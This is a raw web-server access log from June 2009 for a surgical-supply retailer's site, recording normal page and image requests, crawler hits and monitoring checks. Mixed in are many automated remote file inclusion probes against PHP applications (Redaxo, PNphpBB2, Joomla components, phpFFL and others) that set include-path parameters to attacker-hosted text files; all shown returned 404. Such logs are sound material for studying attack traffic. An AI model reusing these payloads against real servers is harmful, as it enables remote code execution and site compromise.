74.6.17.151 - - [16/Jun/2009:01:31:53 -0400] "GET /logs/access_log.Q109020600 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
194.135.103.197 - - [16/Jun/2009:01:32:12 -0400] "GET /logs/access_log.Q109053100//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://a222.altervista.org/id.txt? HTTP/1.1" 404 281 "-" "libwww-perl/5.803"
194.135.103.197 - - [16/Jun/2009:01:32:12 -0400] "GET //redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://a222.altervista.org/id.txt? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
194.135.103.197 - - [16/Jun/2009:01:32:12 -0400] "GET /logs//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://a222.altervista.org/id.txt? HTTP/1.1" 404 259 "-" "libwww-perl/5.803"
214.1.240.252 - - [16/Jun/2009:01:32:19 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086BE4C65D285006BFF09C+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
194.135.103.197 - - [16/Jun/2009:01:33:24 -0400] "GET /logs/access_log.Q109052800//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://a222.altervista.org/id.txt? HTTP/1.1" 404 281 "-" "libwww-perl/5.803"
72.82.228.83 - - [16/Jun/2009:01:33:41 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
72.82.228.83 - - [16/Jun/2009:01:33:41 -0400] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
72.82.228.83 - - [16/Jun/2009:01:33:41 -0400] "GET /logs/access_log.Q109053100/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
72.82.228.83 - - [16/Jun/2009:01:33:42 -0400] "GET /logs/access_log.Q109052200/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:01:33:45 -0400] "GET /logs/access_log.Q109051600//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:01:33:58 -0400] "GET /logs/access_log.Q109051700//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
214.1.240.252 - - [16/Jun/2009:01:34:07 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086BE4C65D285006BFF09C+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:34:07 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:34:07 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
209.59.12.99 - - [16/Jun/2009:01:34:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
214.1.240.252 - - [16/Jun/2009:01:34:10 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:34:10 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
38.99.44.103 - - [16/Jun/2009:01:34:32 -0400] "GET /logs/error_log.Q107102900 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
72.82.228.83 - - [16/Jun/2009:01:34:44 -0400] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
72.82.228.83 - - [16/Jun/2009:01:34:44 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
72.82.228.83 - - [16/Jun/2009:01:34:44 -0400] "GET /logs/access_log.Q109053100/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
72.82.228.83 - - [16/Jun/2009:01:34:44 -0400] "GET /logs/access_log.Q109052200/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
38.99.13.118 - - [16/Jun/2009:01:34:50 -0400] "GET /logs/error_log.Q107072500 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
38.99.13.118 - - [16/Jun/2009:01:37:18 -0400] "GET /logs/error_log.Q108082900 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
38.99.44.103 - - [16/Jun/2009:01:37:40 -0400] "GET /logs/access_log.Q107102500 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
214.1.240.252 - - [16/Jun/2009:01:38:18 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0086BE4360B235007DEF09C+M37+ENG HTTP/1.1" 200 45281 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086BE4C65D285006BFF09C+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:38:20 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086BE4360B235007DEF09C+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:38:20 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086BE4360B235007DEF09C+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:38:20 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086BE4360B235007DEF09C+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:38:20 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086BE4360B235007DEF09C+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:38:21 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086BE4360B235007DEF09C+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:38:21 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086BE4360B235007DEF09C+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:38:21 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086BE4360B235007DEF09C+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:38:21 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086BE4360B235007DEF09C+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:38:21 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086BE4360B235007DEF09C+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:38:22 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086BE4360B235007DEF09C+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:38:22 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086BE4360B235007DEF09C+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:38:22 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086BE4360B235007DEF09C+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:38:22 -0400] "GET /images/space.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086BE4360B235007DEF09C+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:38:22 -0400] "GET /images/pf-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086BE4360B235007DEF09C+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:38:23 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086BE4360B235007DEF09C+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:38:23 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086BE4360B235007DEF09C+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
214.1.240.252 - - [16/Jun/2009:01:38:23 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0086BE4360B235007DEF09C+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
209.59.12.99 - - [16/Jun/2009:01:39:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.249.36.194 - - [16/Jun/2009:01:39:13 -0400] "GET //manager//?_zb_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:01:39:13 -0400] "GET /logs/access_log.Q109051800//manager//?_zb_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:01:39:13 -0400] "GET /logs//manager//?_zb_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:01:39:15 -0400] "GET /appserv_root=http://admin.bestcominfo.com/test.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
218.249.36.194 - - [16/Jun/2009:01:39:16 -0400] "GET //manager//?_zb_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:01:39:16 -0400] "GET /logs//manager//?_zb_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:01:39:16 -0400] "GET /logs/access_log.Q109051800//manager//?_zb_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:01:39:23 -0400] "GET /logs/access_log.Q109052200//manager//?_zb_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:01:39:27 -0400] "GET /logs/access_log.Q109052200//manager//?_zb_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
38.99.44.103 - - [16/Jun/2009:01:40:19 -0400] "GET /logs/access_log.Q107110600 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
218.249.36.194 - - [16/Jun/2009:01:41:23 -0400] "GET /logs/access_log.Q109051800%20%20//manager//?_zb_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:01:41:31 -0400] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://aboutav.com//id1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:01:41:31 -0400] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://aboutav.com//id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:01:41:31 -0400] "GET /logs/access_log.Q109053000%20%20/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://aboutav.com//id1.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:01:41:33 -0400] "GET /logs/access_log.Q109052200%20%20//manager//?_zb_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
194.135.103.197 - - [16/Jun/2009:01:41:54 -0400] "GET //redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://a222.altervista.org/id.txt? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
218.249.36.194 - - [16/Jun/2009:01:42:01 -0400] "GET /logs/access_log.Q109051800%20%20//manager//?_zb_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:01:42:12 -0400] "GET /logs/access_log.Q109052200%20%20//manager//?_zb_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
38.99.44.103 - - [16/Jun/2009:01:42:41 -0400] "GET /logs/access_log.Q108042800 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
125.206.170.126 - - [16/Jun/2009:01:43:05 -0400] "GET //index.php?DOCUMENT_ROOT=http://bangsat1.fileave.com/id.txt?? HTTP/1.0" 404 208 "-" "Mozilla/5.0"
125.206.170.126 - - [16/Jun/2009:01:43:05 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://bangsat1.fileave.com/id.txt?? HTTP/1.0" 404 213 "-" "Mozilla/5.0"
125.206.170.126 - - [16/Jun/2009:01:43:11 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://bangsat1.fileave.com/id.txt?? HTTP/1.0" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:01:43:43 -0400] "GET /logs/access_log.Q109053000%20%20/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://aboutav.com//id1.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:01:43:43 -0400] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://aboutav.com//id1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:01:43:43 -0400] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://aboutav.com//id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jun/2009:01:44:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.249.36.194 - - [16/Jun/2009:01:44:57 -0400] "GET /logs/access_log.Q109053000/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://aboutav.com//id1.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
218.249.36.194 - - [16/Jun/2009:01:45:22 -0400] "GET /logs/access_log.Q109053000/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://aboutav.com//id1.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
121.165.73.157 - - [16/Jun/2009:01:46:07 -0400] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.805"
121.165.73.157 - - [16/Jun/2009:01:46:07 -0400] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
121.165.73.157 - - [16/Jun/2009:01:46:07 -0400] "GET /logs/access_log.Q109060800/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 291 "-" "libwww-perl/5.805"
121.165.73.157 - - [16/Jun/2009:01:46:07 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 291 "-" "libwww-perl/5.805"
218.249.36.194 - - [16/Jun/2009:01:46:53 -0400] "GET /logs/access_log.Q109051300//manager//?_zb_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.106.135.14 - - [16/Jun/2009:01:46:53 -0400] "GET /logs//ncaster/admin/addons/archive/archive.php?adminfolder=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
87.106.135.14 - - [16/Jun/2009:01:46:53 -0400] "GET //ncaster/admin/addons/archive/archive.php?adminfolder=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
87.106.135.14 - - [16/Jun/2009:01:46:53 -0400] "GET /logs/access_log.Q109052400//ncaster/admin/addons/archive/archive.php?adminfolder=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
74.54.32.201 - - [16/Jun/2009:01:46:54 -0400] "GET //ncaster/admin/addons/archive/archive.php?adminfolder=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
74.54.32.201 - - [16/Jun/2009:01:46:54 -0400] "GET /logs/access_log.Q109052400//ncaster/admin/addons/archive/archive.php?adminfolder=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
74.54.32.201 - - [16/Jun/2009:01:46:54 -0400] "GET /logs//ncaster/admin/addons/archive/archive.php?adminfolder=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
87.106.135.14 - - [16/Jun/2009:01:47:27 -0400] "GET /logs/access_log.Q109052400%20%20//ncaster/admin/addons/archive/archive.php?adminfolder=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
84.201.208.50 - - [16/Jun/2009:01:47:41 -0400] "GET /logs/access_log.Q109052400//ncaster/admin/addons/archive/archive.php?adminfolder=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
84.201.208.50 - - [16/Jun/2009:01:47:41 -0400] "GET //ncaster/admin/addons/archive/archive.php?adminfolder=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
84.201.208.50 - - [16/Jun/2009:01:47:41 -0400] "GET /logs//ncaster/admin/addons/archive/archive.php?adminfolder=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
87.106.135.14 - - [16/Jun/2009:01:47:52 -0400] "GET /logs/access_log.Q109052900%20%20//ncaster/admin/addons/archive/archive.php?adminfolder=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
74.54.32.201 - - [16/Jun/2009:01:48:06 -0400] "GET /logs/access_log.Q109052400%20%20//ncaster/admin/addons/archive/archive.php?adminfolder=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
74.54.32.201 - - [16/Jun/2009:01:48:33 -0400] "GET /logs/access_log.Q109052900%20%20//ncaster/admin/addons/archive/archive.php?adminfolder=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
86.96.226.93 - - [16/Jun/2009:01:48:55 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; yie8)"
86.96.229.87 - - [16/Jun/2009:01:48:56 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; yie8)"
86.96.229.87 - - [16/Jun/2009:01:48:57 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; yie8)"
86.96.226.93 - - [16/Jun/2009:01:48:57 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; yie8)"
209.59.12.99 - - [16/Jun/2009:01:49:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
84.201.208.50 - - [16/Jun/2009:01:49:14 -0400] "GET /logs/access_log.Q109052400%20%20//ncaster/admin/addons/archive/archive.php?adminfolder=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
83.111.207.42 - - [16/Jun/2009:01:49:25 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT HTTP/1.1" 200 37996 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; yie8)"
